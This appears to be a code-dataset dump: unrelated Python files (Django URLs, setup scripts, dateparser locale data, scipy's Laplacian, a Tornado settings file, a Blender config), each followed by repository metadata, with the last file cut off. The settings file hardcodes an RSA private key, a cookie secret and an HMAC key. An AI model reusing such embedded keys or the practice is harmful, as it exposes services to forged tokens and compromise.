from .views import Index,SignUp,UserDashboard,AdminDashboard,logout,showAdminData,deleteuser,activeUser,deactiveUser,UserDetailEdit,uploadImage
# from .views import Index,UserDashboard,SignUp,AdminDashboard
app_name='management'
urlpatterns = [
# path('',homepage,name="index"),
path('',Index.as_view(), name='index'),
path('signup',SignUp.as_view(),name="signup"),
path('userdashboard',UserDashboard.as_view(),name="userDashboard"),
path('admindashboard',AdminDashboard.as_view(),name="adminDashboard"),
path('admindashboard/showuserdata/',showAdminData.as_view(),name='showAdminData'),
path('admindashboard/showuserdata/deleteuser/<userId>',deleteuser,name='deleteuser'),
path('admindashboard/showuserdata/activeUser/<userId>', activeUser, name='activeUser'),
path('admindashboard/showuserdata/deactiveUser/<userId>', deactiveUser, name='deactiveUser'),
path('uploadimage/',uploadImage,name="uploadImage"),
path('editUserDetail/',UserDetailEdit.as_view(),name='userEditDetail'),
path('logout',logout,name='logout')
]
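# Reverse-lookup sketch (assumption: this URLconf is included by the project
# root): reverse('management:signup') resolves to the signup path above.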
| 49.416667 | 143 | 0.764755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 502 | 0.423272 |
d5ec93a99d9c113668c2693c8d65499328f692cd | 1,489 | py | Python | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
:file: setup.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2021/09/20 11:11:54
'''
from os import path
from setuptools import setup, find_packages
basedir = path.abspath(path.dirname(__file__))
with open(path.join(basedir, "README.md"), encoding='utf-8') as f:
long_description = f.read()
setup(
name="zf-school-sdk",
author="farmer.chillax",
version="1.3.2",
license='MIT',
author_email="farmer-chong@qq.com",
description="zf School SDK for Python",
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/Farmer-chong/new-school-sdk',
packages=find_packages(),
# package_data={},
package_data={"school_sdk": ['check_code/model.pkl']},
include_package_data=True,
platforms='any',
zip_safe=False,
install_requires=[
'requests',
'pyquery',
'bs4',
'Pillow',
'fake-headers',
'torch',
'torchvision',
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.8',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
# python zf-setup.py bdist_wheel sdist
# twine upload dist/* | 26.589286 | 70 | 0.620551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 784 | 0.526528 |
d5edbea518993ed30402ca6ed7151f569ce035ff | 42 | py | Python | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | name = "David Asiru Adetomiwa"
print(name) | 21 | 30 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 23 | 0.547619 |
d5f72b6bb8de932265e3494ed6520e23b33d2b72 | 705 | py | Python | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | #Yannick p6e8 Write a program that first asks for a number and then keeps asking for numbers until the sum of the numbers entered matches the initial number. The program finishes by printing the list of numbers.
limite = int(input("Enter the limit: "))
valores = int(input("Enter a value: "))
listavalores = []
listavalores.append(valores)
while limite > sum(listavalores):
    valores = int(input("Enter another value: "))
    listavalores.append(valores)
print(f"The limit to reach is {limite}. The list created is ", end="")
for i in range(len(listavalores)):
    print(listavalores[i], end=" ")
print(f"since the sum of these numbers is {sum(listavalores)}")
| 30.652174 | 219 | 0.704965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 397 | 0.559155 |
d5fb061a3a4378d9720ff3a451d5983678f6ed08 | 2,712 | py | Python | venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py | yuta-komura/vishnu | 67173b674d5f4f3be189474103612447ef69ab44 | [
"MIT"
] | 1 | 2021-11-17T04:55:14.000Z | 2021-11-17T04:55:14.000Z | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
info = {
"name": "ebu",
"date_order": "DMY",
"january": [
"mweri wa mbere",
"mbe"
],
"february": [
"mweri wa kaĩri",
"kai"
],
"march": [
"mweri wa kathatũ",
"kat"
],
"april": [
"mweri wa kana",
"kan"
],
"may": [
"mweri wa gatano",
"gat"
],
"june": [
"mweri wa gatantatũ",
"gan"
],
"july": [
"mweri wa mũgwanja",
"mug"
],
"august": [
"mweri wa kanana",
"knn"
],
"september": [
"mweri wa kenda",
"ken"
],
"october": [
"mweri wa ikũmi",
"iku"
],
"november": [
"mweri wa ikũmi na ũmwe",
"imw"
],
"december": [
"mweri wa ikũmi na kaĩrĩ",
"igi"
],
"monday": [
"njumatatu",
"tat"
],
"tuesday": [
"njumaine",
"ine"
],
"wednesday": [
"njumatano",
"tan"
],
"thursday": [
"aramithi",
"arm"
],
"friday": [
"njumaa",
"maa"
],
"saturday": [
"njumamothii",
"nmm"
],
"sunday": [
"kiumia",
"kma"
],
"am": [
"ki"
],
"pm": [
"ut"
],
"year": [
"mwaka"
],
"month": [
"mweri"
],
"week": [
"kiumia"
],
"day": [
"mũthenya"
],
"hour": [
"ithaa"
],
"minute": [
"ndagĩka"
],
"second": [
"sekondi"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"ĩgoro"
],
"0 day ago": [
"ũmũnthĩ"
],
"in 1 day": [
"rũciũ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
| 15.859649 | 34 | 0.289823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,145 | 0.419107 |
d5fc2fcc2b0439d566be57074eaeae0f3e82e072 | 129 | py | Python | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | """Preprocessing DeepA2 datasets for LM training"""
# flake8: noqa
from deepa2.preptrain.t2tpreprocessor import T2TPreprocessor
| 25.8 | 60 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.503876 |
d5fcff660972d9337742f70ae81e7f0f26eaadac | 310 | py | Python | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(name='awspk',
version='0.1',
description='A aws cli pen knife with loads of interested stuff',
author='Martin Farrow',
author_email='awspk@dibley.net',
py_modules=['awspk'],
license='LICENSE',
)
| 23.846154 | 71 | 0.651613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.435484 |
9119b7e105152a68ddb6c7704cd3d58179e633e6 | 4,687 | py | Python | gavPrj/dataset_core.py | GavinK-ai/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | 1 | 2021-11-15T06:16:44.000Z | 2021-11-15T06:16:44.000Z | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | import os
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
#srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4')
#srcPaths = ('all_dataset/s1',
# 'all_dataset/s10',
# 'all_dataset/s11',
# 'all_dataset/s12',
# 'all_dataset/s13',
# 'all_dataset/s14',
# 'all_dataset/s15',
# 'all_dataset/s16',
# 'all_dataset/s17',
# 'all_dataset/s18',
# 'all_dataset/s19',
# 'all_dataset/s2',
# 'all_dataset/s20',
# 'all_dataset/s21',
# 'all_dataset/s22',
# 'all_dataset/s23',
# 'all_dataset/s24',
# 'all_dataset/s25',
# 'all_dataset/s26',
# 'all_dataset/s27',
# 'all_dataset/s28',
# 'all_dataset/s29',
# 'all_dataset/s3',
# 'all_dataset/s30',
# 'all_dataset/s31',
# 'all_dataset/s32',
# 'all_dataset/s33',
# 'all_dataset/s34',
# 'all_dataset/s35',
# 'all_dataset/s36',
# 'all_dataset/s37',
# 'all_dataset/s38',
# 'all_dataset/s39',
# 'all_dataset/s4',
# 'all_dataset/s40',
# 'all_dataset/s41',
# 'all_dataset/s42',
# 'all_dataset/s43',
# 'all_dataset/s44',
# 'all_dataset/s45',
# 'all_dataset/s46',
# 'all_dataset/s47',
# 'all_dataset/s48',
# 'all_dataset/s49',
# 'all_dataset/s5',
# 'all_dataset/s50',
# 'all_dataset/s51',
# 'all_dataset/s52',
# 'all_dataset/s53',
# 'all_dataset/s54',
# 'all_dataset/s55',
# 'all_dataset/s56',
# 'all_dataset/s57',
# 'all_dataset/s58',
# 'all_dataset/s59',
# 'all_dataset/s6',
# 'all_dataset/s60',
# 'all_dataset/s61',
# 'all_dataset/s62',
# 'all_dataset/s63',
# 'all_dataset/s7',
# 'all_dataset/s8',
# 'all_dataset/s9')
srcPaths = ('testdataset/t1','testdataset/t2')
datasetfilename = 'testdataset1.npz'
def create_dataset(datasetfilename, srcPaths, classNames):
imgList = []
labelList = []
labelNameList = []
for srcPath in srcPaths:
# append all files in srcPath dir into imgList and labelList
for fname in os.listdir(srcPath):
filePath = os.path.join(srcPath, fname)
img = cv.imread(filePath)
            # split off the file name (without extension) to use as the label
fname_no_ext = os.path.splitext(fname)[0]
# label = fname_no_ext[-1]
label = fname_no_ext
imgList.append(img)
labelList.append(classNames[label])
labelNameList.append(label)
    # convert imgList and the labels to numpy arrays
images = np.array(imgList, dtype='object')
labels = np.array(labelList, dtype='object')
labelnames = np.array(labelNameList)
# save converted images and labels into compressed numpy zip file
np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames)
return True
def displayImg():
# for fname in os.listdir(srcPath):
pass
if __name__ == '__main__':
# save a dataset in numpy compressed format
# datasetfilename = 'tiredataset.npz'
classNames = {'afiq':0, 'azureen':1, 'gavin':2, 'goke':3, 'inamul':4, 'jincheng':5, 'mahmuda':6, 'numan':7, 'saseendran':8}
if create_dataset(datasetfilename, srcPaths, classNames):
data = np.load(datasetfilename, allow_pickle=True)
imgList = data['images']
labelList = data['labels']
labelNameList = data['labelnames']
img = imgList[0]
label = labelList[0]
imgRGB = img[:, :, ::-1]
plt.imshow(imgRGB)
plt.title(label)
plt.show()
print(imgList.shape)
print(labelList.shape)
# imgList, labelList = create_dataset()
# img = imgList[0]
# label = labelList[0]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[1]
# label = labelList[1]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[3]
# label = labelList[3]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
| 26.331461 | 128 | 0.528056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,287 | 0.487945 |
9120d4c7c58950a1c79165874f5716c1d3e76e4c | 4,421 | py | Python | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | 1 | 2018-10-04T15:34:14.000Z | 2018-10-04T15:34:14.000Z | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | null | null | null | """
Laplacian of a compressed-sparse graph
"""
# Authors: Aric Hagberg <hagberg@lanl.gov>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# License: BSD
import numpy as np
from scipy.sparse import isspmatrix, coo_matrix
###############################################################################
# Graph laplacian
def laplacian(csgraph, normed=False, return_diag=False):
""" Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
"""
if csgraph.ndim != 2 or csgraph.shape[0] != csgraph.shape[1]:
raise ValueError('csgraph must be a square matrix or array')
    if normed and np.issubdtype(csgraph.dtype, np.integer):
        # np.integer covers signed and unsigned ints; np.int/np.uint/np.float
        # are no longer valid NumPy attribute names
        csgraph = csgraph.astype(np.float64)
if isspmatrix(csgraph):
return _laplacian_sparse(csgraph, normed=normed,
return_diag=return_diag)
else:
return _laplacian_dense(csgraph, normed=normed,
return_diag=return_diag)
def _laplacian_sparse(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
if not graph.format == 'coo':
lap = (-graph).tocoo()
else:
lap = -graph.copy()
diag_mask = (lap.row == lap.col)
if not diag_mask.sum() == n_nodes:
# The sparsity pattern of the matrix has holes on the diagonal,
# we need to fix that
diag_idx = lap.row[diag_mask]
diagonal_holes = list(set(range(n_nodes)).difference(
diag_idx))
new_data = np.concatenate([lap.data, np.ones(len(diagonal_holes))])
new_row = np.concatenate([lap.row, diagonal_holes])
new_col = np.concatenate([lap.col, diagonal_holes])
lap = coo_matrix((new_data, (new_row, new_col)), shape=lap.shape)
diag_mask = (lap.row == lap.col)
lap.data[diag_mask] = 0
w = -np.asarray(lap.sum(axis=1)).squeeze()
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap.data /= w[lap.row]
lap.data /= w[lap.col]
lap.data[diag_mask] = (1 - w_zeros[lap.row[diag_mask]]).astype(lap.data.dtype)
else:
lap.data[diag_mask] = w[lap.row[diag_mask]]
if return_diag:
return lap, w
return lap
def _laplacian_dense(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
lap = -np.asarray(graph) # minus sign leads to a copy
# set diagonal to zero
lap.flat[::n_nodes + 1] = 0
w = -lap.sum(axis=0)
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap /= w
lap /= w[:, np.newaxis]
lap.flat[::n_nodes + 1] = 1 - w_zeros
else:
lap.flat[::n_nodes + 1] = w
if return_diag:
return lap, w
return lap
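if __name__ == '__main__':
    # Demo sketch (not part of the original module): the normalized variant of
    # the docstring example; output is computed at run time, not quoted here.
    G = np.arange(5) * np.arange(5)[:, np.newaxis]
    print(laplacian(G, normed=True))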
| 32.507353 | 86 | 0.570007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,112 | 0.47772 |
9120f5bc8f814b4692efc7406b81c0fe8103d83e | 7,225 | py | Python | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | 1 | 2018-10-12T15:12:15.000Z | 2018-10-12T15:12:15.000Z | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | import os
import logging
from collections import namedtuple
from Crypto.PublicKey import RSA
from tornado import gen
from tornado import concurrent
from cosmos.rbac.object import *
from cosmos.service import OBSERVER_PROCESSOR
DEBUG = True
DB_HOST = "127.0.0.1"
DB_NAME = "cosmos"
DB_PORT = 27017
DB_USER_NAME = None
DB_USER_PASSWORD = None
LOG_DB_HOST = "127.0.0.1"
LOG_DB_NAME = "cosmos"
LOG_COL_NAME = "log"
LOG_DB_PORT = 27017
LOG_LEVEL = logging.DEBUG
LOG_DB_USER_NAME = None
LOG_DB_USER_PASSWORD = None
STATIC_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "app")
TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates")
INDEX_HTML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "app/index.html")
LOGIN_HTML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates/login.html")
WEB_SERVER_LISTEN_PORT = 8080
DB_CHANGE_PROCESSOR_ENDPOINT_FORMAT = "http://localhost:{0}/handlechange"
#TODO: You MUST change the following values
COOKIE_SECRET = "+8/YqtEUQfiYLUdO2iJ2OyzHHFSADEuKvKYwFqemFas="
HMAC_KEY = "+8/YqtEUQfiYLUdO2iJ2OyzHIFSAKEuKvKYwFqemFas="
facebook_client_id='000000000000000'
facebook_client_secret='00000000000000000000000000000000'
facebook_scope = "email,public_profile,user_friends"
facebook_redirect_uri = None
DEFAULT_LOGIN_NEXT_URI = "/"
"""
# pip install pycrypto for Crypto
# then from python console generate private_pem and public_pem and assign to SERVICE_PRIVATE_KEY and SERVICE_PUBLIC_KEY
import Crypto.PublicKey.RSA as RSA
key = RSA.generate(2048)
private_pem = key.exportKey()
public_pem = key.publickey().exportKey()
"""
# TODO: set both keys below. Private key backup must be kept in a secure place and should never be shared
# If private key is compromised, this service and all other services that trust this will be compromised
# Public key is to share publicly for verification
SERVICE_PRIVATE_KEY = None
SERVICE_PUBLIC_KEY = None
directory_listing_allowed = True
CONFIGURE_LOG = False
START_WEB_SERVER = True
START_OBJECT_CHANGE_MONITOR = False
GOOGLE_OAUTH2_CLIENT_ID = None
GOOGLE_OAUTH2_CLIENT_SECRET = None
GOOGLE_OAUTH2_REDIRECT_URI = None
GITHUB_CLIENT_ID = None
GITHUB_CLIENT_SECRET = None
GITHUB_OAUTH2_CALLBACK_URI = None
USERS_IDENTITY_COL_NAME = "cosmos.users.identity"
USERS_PROFILE_FB_COL_NAME = "cosmos.users.profile.facebook"
USERS_FB_FRIENDS_COL_NAME = "cosmos.users.facebook.friends"
login_url = "/login/"
OAUTH2_SERVICE_URL = r"/(?P<tenant_id>[^\/]+)/oauth2/(?P<function>[^\/]+)/"
OAUTH2_PRIVATE_KEY_PEM = b'-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAl0RIYISOe+9F8dRkm+XQrdaVsn/d3GjufnBnFARRgceu+E6q\nWLlptI5arhckFyXjDOAUEuMnOwmISfeXHrIIp4BU6RMjqRw6ciaIhI7e3LSn5fQ7\nOwCywUaHlUkyq+zQynfH77lUC95YumyUQzGVfdiwQw8XZZYDo2wAFMKJa8heo38Z\nQ0HT788VrcuSa1f4PY9i/wRHXF+xp/9NWUE7wER8eNJjqKxkm0EUKYuB23vUFLHh\n8PG7DiATUlCCpV5txhHcNXa2iEoOGecdWg8Yk5Qs2Gq9aqacJGcgfFK9DN+2/yLn\nFEj+xMVPhB2ynILoJ9N+lfA3TE6nWVKiuriXBQIDAQABAoIBAQCAX2CVGKnbH+ra\nGofvjg+VGCEexUlBvoN4Jmg0Ip4RZ6dj70690UyWAKGQUO89/dc8nAYtKT2n6qUR\nMN+9GxYhINXun2GKKPyo127QIHeeEmrSynxhzGvnfrWdyesI4QcobJLvLPbYw6/F\nNlR02eWmUXj00B/pBHC+Be/jrlz1bF5Gwbw/RINzEJPOxVfaN2D31lotetx5WnV7\nXrTxR5ONpCnwbK8phH4/vQL3rv+ZJgKVhRM8uqd+auW5Lp57y36JFXb+g5SmkFo3\nq+mB2CfMkyip8zpJGDyyVo8XiI1jKieqaiimZ4zpJZwkClBzYsFmio60f9smMGYB\n+nQCX5iZAoGBAL6WtY9BSL0hIxMIwDh4C87rORMmy8ZW5sl91wdFHmjnqlc2Q2yS\n3uVwK32BvxQCTq6FXNRoqYO0xHSrrupSRTJD5KT9EoxpaGlqi1MSB6U6o7r41bSb\nhNwcjKJ40OSABZ/YzATOwq9+AfgU+pMZD+WNlzesYL+7QIPHyKXdwrPLAoGBAMsu\ntcUadzsZEmaaSW5xtouyZF5tWPadB6VZ0Gney8x6uWQ2+ZGLv0QRIxJP0f4cBTkY\nsPx5pUZuo7oaDzCaRH9cV2VJFBahsGrFqcsexVsKh8CfZEMD1PBptodD1Cialr9M\nL0RdSu+1lmcfRqxOXSlaMSHml/cqfOjfHOj3RaZvAoGAEG2LLtLwwySlElHxx6xJ\nUEekPstcSzdYY0vOihjiGybE3wmVXDl4rwwxI3tYjg/42kAylTiETA771BasWBRJ\nVKDXh4Us4R+A2X1OjxWBxTM9w7MJMK0rEZIAaUzCrL+APJwCUfPEgj35S3n7c0x4\nu0+uFiVsnXo1gGZrHCj2TGsCgYEApm3Ccos1MvFcgzLKB2+ZqWAcmsRS5N7Hjoe9\nEZtvsDSuewoU70VbDDRFWBCN3+mv1Y8GGijCWqjx79S8sIEMro5DADIWBFu5GByE\n8l5oJiTAAeYNyF7xI2RUIQRMWl4WMOgEp6kLYsKJSjryNt2Rrfe02yH5RHpHCrEH\nC0TQhn0CgYB0iyjs20bdGYYWNTMlSYPtf8LVhUktvGYyytA/sepRXUe13T87vjCc\nvD3utXPsuaBVGhloE7Dk5YHJdar4n5UcLITNJnu1TyRM4binlzbU4rByxVjclaSX\nGB0O/DCgCsgNFK+LFKf/N1EhRxwJKy+BLVWCIshsAxNv26u296I9jA==\n-----END RSA PRIVATE KEY-----'
OAUTH2_PUBLIC_KEY_PEM = b'-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAl0RIYISOe+9F8dRkm+XQ\nrdaVsn/d3GjufnBnFARRgceu+E6qWLlptI5arhckFyXjDOAUEuMnOwmISfeXHrII\np4BU6RMjqRw6ciaIhI7e3LSn5fQ7OwCywUaHlUkyq+zQynfH77lUC95YumyUQzGV\nfdiwQw8XZZYDo2wAFMKJa8heo38ZQ0HT788VrcuSa1f4PY9i/wRHXF+xp/9NWUE7\nwER8eNJjqKxkm0EUKYuB23vUFLHh8PG7DiATUlCCpV5txhHcNXa2iEoOGecdWg8Y\nk5Qs2Gq9aqacJGcgfFK9DN+2/yLnFEj+xMVPhB2ynILoJ9N+lfA3TE6nWVKiuriX\nBQIDAQAB\n-----END PUBLIC KEY-----'
OAUTH2_TOKEN_EXPIRY_SECONDS = 600
TENANT_ID = 'cosmosframework.com'
OAUTH2_TRUSTED_REDIRECT_URLS = ['http://localhost:8080/oauth2client/authorize/']
AUTH_PUBLIC_KEY_PEM_URL = r"/(?P<tenant_id>[^\/]+)/auth/key/"
#TODO: You should remove this observer processor in a production environment
def test_observer(user, object_service, object_name, data, access_type, columns = None, *args, **kwargs):
assert object_name == "test"
assert access_type == AccessType.READ or access_type == AccessType.INSERT or access_type == AccessType.UPDATE or access_type == AccessType.DELETE
logging.info("Test object observer is called with [{}, {}, {}, {}, {}, {}].".format(user, object_service, object_name, data, access_type, columns))
if AccessType.INSERT == access_type:
val = concurrent.Future()
val.set_result(data)
return (val)
if AccessType.UPDATE == access_type or AccessType.DELETE == access_type:
r = ({"error": None, "n": 1, "ok": 1, "updatedExisting": 1})
val = concurrent.Future()
val.set_result({"_id":r})
return (val)
find_one = kwargs.get("find_one", False)
if find_one:
val = concurrent.Future()
val.set_result({"_id":data})
return (val)
else:
Result = namedtuple("CosmosEmptyResultSet", "fetch_next")
val = concurrent.Future()
val.set_result(False)
return (Result(fetch_next=val))
observers = [
{
"object_name": "test",
"function": test_observer,
"access": [AccessType.READ, AccessType.INSERT, AccessType.UPDATE, AccessType.DELETE],
"type": OBSERVER_PROCESSOR
}
]
try:
from local_settings import *
except ImportError:
pass
if DB_USER_NAME and DB_USER_PASSWORD:
DATABASE_URI = "mongodb://"+ DB_USER_NAME + ":"+ DB_USER_PASSWORD +"@"+ DB_HOST+":"+str(DB_PORT)+"/"+DB_NAME
else:
DATABASE_URI = "mongodb://"+DB_HOST+":"+str(DB_PORT)
if LOG_DB_USER_NAME and LOG_DB_USER_PASSWORD:
LOG_DATABASE_URI = "mongodb://"+ LOG_DB_USER_NAME + ":"+ LOG_DB_USER_PASSWORD +"@"+ LOG_DB_HOST+":"+str(LOG_DB_PORT)+"/"+LOG_DB_NAME
else:
LOG_DATABASE_URI = "mongodb://"+ LOG_DB_HOST+":"+str(LOG_DB_PORT)
GOOGLE_OAUTH2_SETTINGS = {"key": GOOGLE_OAUTH2_CLIENT_ID, "secret": GOOGLE_OAUTH2_CLIENT_SECRET, "redirect_uri": GOOGLE_OAUTH2_REDIRECT_URI}
GITHUB_OAUTH_SETTINGS = {"client_id": GITHUB_CLIENT_ID, "secret": GITHUB_CLIENT_SECRET, "redirect_uri": GITHUB_OAUTH2_CALLBACK_URI}
| 47.847682 | 1,732 | 0.800969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,728 | 0.515986 |
9125a2258a5cbeeafce52644773c51a924d107ac | 392 | py | Python | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | # Introduction
print('Program to sum 8 values using vectors/lists')
print()
# Declare the vector
valores = [0, 0, 0, 0, 0, 0, 0, 0]
# Request the values
for i in range(len(valores)):
    valores[i] = int(input('Enter the value: '))
# Compute the sum
soma = 0
for i in range(len(valores)):
soma += valores[i]
# Display the result
print(f'The sum of the values is {soma}')
| 20.631579 | 64 | 0.67602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.522613 |
91266dc2fa03da47339e3882e71342b1ee45462b | 2,326 | py | Python | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | 1 | 2019-03-25T04:37:06.000Z | 2019-03-25T04:37:06.000Z | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | 3 | 2020-07-24T11:55:48.000Z | 2022-02-20T20:49:17.000Z | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | null | null | null | # Blender-specific Configuration Settings
from math import pi
render = {
"render_engine": "CYCLES",
"render": {"cycles_device": "GPU"},
"dimensions": {"resolution": [1280, 1024], "percentage": 100.0},
"sampling": {"cycles_samples": 256, "cycles_preview_samples": 16},
"light_paths": {
"transparency": {"max_bounces": 1, "min_bounces": 1},
"bounces": {"max_bounces": 1, "min_bounces": 1},
"diffuse": 1,
"glossy": 1,
"transmission": 1,
"volume": 0,
"reflective_caustics": False,
